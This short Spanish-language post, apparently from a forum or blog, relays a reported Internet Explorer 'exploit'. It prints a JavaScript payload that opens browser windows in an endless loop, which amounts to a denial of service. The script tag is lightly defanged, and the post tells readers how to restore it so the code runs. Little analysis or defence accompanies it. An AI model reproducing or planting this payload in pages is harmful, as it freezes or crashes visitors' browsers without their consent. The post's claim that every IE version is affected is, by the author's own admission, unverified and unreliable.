Ésta mañana SecuriTeam publicaba un nuevo exploit que según parece afecta a todas las versiones de Internet Explorer(no han especificado ninguna), no obstante no he podido verificar que sea en todas las versiones. Se trata de una modificación sobre un JavaScript, de los más utilizados, el 'window.open();'.
La Síntaxis del Exploit es la siguiente:
<scr!pt>
var i;
i=0;
for(;;) {
i++;
window.open('http://www.bandaancha.st','Ventanita'+i,null);
}
</script>
Básicamente solo consiste en cambiar la !(<scr!pt>) por i(<script>).
Por el momento, nadie microsoft no ha anunciado nada al respecto.
PD: He modificado la sintaxis, por equivocación lo habia escrito al revés. ;)